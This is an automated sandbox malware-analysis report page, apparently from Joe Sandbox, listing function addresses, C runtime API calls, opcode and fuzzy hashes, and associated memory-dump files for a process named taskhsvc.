API ID: abort$__stack_chk_fail$free
String ID:
API String ID: 2536802734-0
Opcode ID: 7388cdee8704ae5bd208d0ce736f7c2f783b1632bfe0e9714643903654258e30
Instruction ID: b6468c5dd4cd02464069bd4a1baf02145c2d8b1a7dc64959181f79c2bedd81b9
Opcode Fuzzy Hash: 7388cdee8704ae5bd208d0ce736f7c2f783b1632bfe0e9714643903654258e30
Instruction Fuzzy Hash: 8251C6B5E0420A9FCB04DFA8C885AAEBBF1BB48314F15C829E994E7351D738D945CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00DBA38E Relevance: 4.6, APIs: 3, Instructions: 115COMMON

Download Yara Rule

APIs

Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE6586
Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE659C
Part of subcall function 00EE6562: __stack_chk_fail.LIBSSP-0 ref: 00EE6601

Part of subcall function 00EE9764: __stack_chk_fail.LIBSSP-0 ref: 00EE9857

abort.MSVCRT ref: 00DBA3BA

Part of subcall function 00D92188: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00DBA3CA), ref: 00D921BD

abort.MSVCRT ref: 00DBA402
__stack_chk_fail.LIBSSP-0 ref: 00DBA54B

Memory Dump Source

Source File: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$abortstrrchr
String ID:
API String ID: 2422377151-0
Opcode ID: 95ea435f1cc8f025a62a2a90ab6eef5db49bd3cc46a4500bb672f2704402f140
Instruction ID: 8689e000f0825cc84a0000b78217b88f8f6550d5e40f54d3bdd8b57f1d97bee4
Opcode Fuzzy Hash: 95ea435f1cc8f025a62a2a90ab6eef5db49bd3cc46a4500bb672f2704402f140
Instruction Fuzzy Hash: 0C41BBB4908785DFCB10EFA9C0896AEB7F0AF00344F058859E8D59B352D778D885DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00DE17F8 Relevance: 4.6, APIs: 3, Instructions: 108COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 00DE185E

Part of subcall function 00D9262A: abort.MSVCRT ref: 00D9267A
Part of subcall function 00D9262A: __stack_chk_fail.LIBSSP-0 ref: 00D92745

Part of subcall function 00DE0D7D: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DE307F), ref: 00DE0DD3
Part of subcall function 00DE0D7D: __stack_chk_fail.LIBSSP-0 ref: 00DE0E2D

abort.MSVCRT ref: 00DE18A8
__stack_chk_fail.LIBSSP-0 ref: 00DE19AB

Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE6586
Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE659C
Part of subcall function 00EE6562: __stack_chk_fail.LIBSSP-0 ref: 00EE6601

Part of subcall function 00EE9764: __stack_chk_fail.LIBSSP-0 ref: 00EE9857

Memory Dump Source

Source File: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$abort$strrchr
String ID:
API String ID: 797389190-0
Opcode ID: b114b555a7677ed5e4f00a424b89f78945616e06d3861f2a55ea76892a8040de
Instruction ID: 9a62f5bf745a0ccc5ac223e4aaef1a693aa5a8f5555e064deeeab1729ba49e99
Opcode Fuzzy Hash: b114b555a7677ed5e4f00a424b89f78945616e06d3861f2a55ea76892a8040de
Instruction Fuzzy Hash: BD4106B4A083569FCB00EF6AC54576EBBF0BF44344F048819E4E49B292D778D944DF62

Uniqueness

Uniqueness Score: -1.00%

Function 00DB3B5E Relevance: 4.6, APIs: 3, Instructions: 101COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 00DB3BBD
__stack_chk_fail.LIBSSP-0 ref: 00DB3CB8

Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE6586
Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE659C
Part of subcall function 00EE6562: __stack_chk_fail.LIBSSP-0 ref: 00EE6601

Part of subcall function 00EE9764: __stack_chk_fail.LIBSSP-0 ref: 00EE9857

abort.MSVCRT ref: 00DB3C00

Memory Dump Source

Source File: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$abortstrrchr
String ID:
API String ID: 2422377151-0
Opcode ID: 6d0f79daf71d535403537a0eb7b4d8f6c39c690a35fe029286c1163ec2bd98fa
Instruction ID: ad159f11842fc2f247cd5405a9815f928f5954762dde8fcf991dac9928832c17
Opcode Fuzzy Hash: 6d0f79daf71d535403537a0eb7b4d8f6c39c690a35fe029286c1163ec2bd98fa
Instruction Fuzzy Hash: D0416EB4A0021ACFCB00DFA9C5849AEFBF1FF48310B05C559E858AB316D738E8459F61

Uniqueness

Uniqueness Score: -1.00%

Function 00DB4071 Relevance: 4.6, APIs: 3, Instructions: 100COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DB5072), ref: 00DB4145
__stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DB5072), ref: 00DB41C6

Part of subcall function 00DB34DB: abort.MSVCRT(?,?,?,00DA2E25), ref: 00DB35A1
Part of subcall function 00DB34DB: memset.MSVCRT ref: 00DB35BC
Part of subcall function 00DB34DB: __stack_chk_fail.LIBSSP-0(?,?,?,00DA2E25), ref: 00DB35CF

Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE6586
Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE659C
Part of subcall function 00EE6562: __stack_chk_fail.LIBSSP-0 ref: 00EE6601

Part of subcall function 00EE9764: __stack_chk_fail.LIBSSP-0 ref: 00EE9857

abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DB5072), ref: 00DB419E

Memory Dump Source

Source File: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$abort$strrchr$memset
String ID:
API String ID: 1279798642-0
Opcode ID: a3ec422edd4c4e1ac018c6971acd36c609f5aa4f61e3c1da714efaa55c98a77f
Instruction ID: 5c25b9a0e1b89212d9068e11ff4c08228887b6ae29831874be8bd5f94e83e07b
Opcode Fuzzy Hash: a3ec422edd4c4e1ac018c6971acd36c609f5aa4f61e3c1da714efaa55c98a77f
Instruction Fuzzy Hash: B041A4B4A0430ACFCB04EFA9C485AAEB7F0FF48340F058859E855AB316D778E9459B61

Uniqueness

Uniqueness Score: -1.00%

Function 00EF587B Relevance: 4.6, APIs: 3, Instructions: 99COMMON

Download Yara Rule

APIs

_stati64.MSVCRT ref: 00EF5913
free.MSVCRT ref: 00EF592C
__stack_chk_fail.LIBSSP-0 ref: 00EF59BE

Memory Dump Source

Source File: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
